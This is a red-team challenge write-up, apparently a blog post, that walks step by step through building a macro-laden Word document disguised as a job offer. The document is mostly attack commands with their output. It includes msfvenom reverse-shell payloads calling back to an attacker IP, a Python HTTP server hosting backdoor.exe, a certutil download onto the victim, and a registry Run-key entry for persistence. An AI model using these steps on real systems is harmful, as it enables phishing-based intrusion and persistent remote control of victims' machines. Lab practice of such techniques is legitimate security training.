RedTeam Challenge: Project S0c14l M3d1a series[II]

 Hi everyone,

In this step we are going to make a malicious office file that contains embedded malware using an easy techniques.

Attack context is a trojan file that execute a malware internally during a file visualization or edit by the target user.

GENEARTE MALICIOUS PAYLOAD:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=9999 -f vba > payload2.vba

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 324 bytes

Final size of vba file: 2626 bytes

The first step is create a malicious payload with msfvenom tool on the attacker machine the output format should be vba file.This type of extension file belong to Microsoft office macros scripting software on windows.

GENERATE DOCUMENT:

I use "Macro pack" tool for inject the previous malicious payload on the trojan document:

The document file looks like a normal Microsoft office word document:

EDIT AND SEND DOCUMENT:

This is the moment of edit the document with the information that you want, for example a job opportunity:

WAIT FOR RESPONSE:

And form the attacker side yoo only need wait for response on the chosen in the malicious payload and enjoy:

PERSISTENCE:

1. From the attacker machine obtain generate a new payload:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=6969 -f exe > backdoor.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 324 bytes

Final size of exe file: 73802 bytes

The previous command generate an executable windows file with name backdoor and extension ".exe"

2. From the attacker machine launch a http server with python3 for share the exe file with the target machine:

python3 -m http.server 8989

Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...

10.10.10.8 - - [30/Sep/2021 20:25:13] "GET /backdoor.exe HTTP/1.1" 200 -

10.10.10.8 - - [30/Sep/2021 20:25:13] "GET /backdoor.exe HTTP/1.1" 200 -

3. From the target machine, download the binary file with certutil:

certutil -f -urlcache "http://10.10.10.5:8989/backdoor.exe" %APPDATA%\backdoor.exe

certutil -f -urlcache "http://10.10.10.5:8989/backdoor.exe" %APPDATA%\backdoor.exe

****  En l�nea  ****

CertUtil: -URLCache comando completado correctamente.

4. Modify registry on the target machine for persistence operation:

reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v persistence2 /t REG_SZ 

/d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \"start-process  $env:APPDATA\backdor.exe\"

And this is all, for every reboot of the target machine and login by the powned user : 

The binary backdor.exe it's going to be execute byitself and this binary spawn cmd to the attacker machine.

And this is all for my first RedTeam challenge execution "step 2", I hope that you'll share with me this challenge on the next days and we keep in touch.

with best regards, f0ns1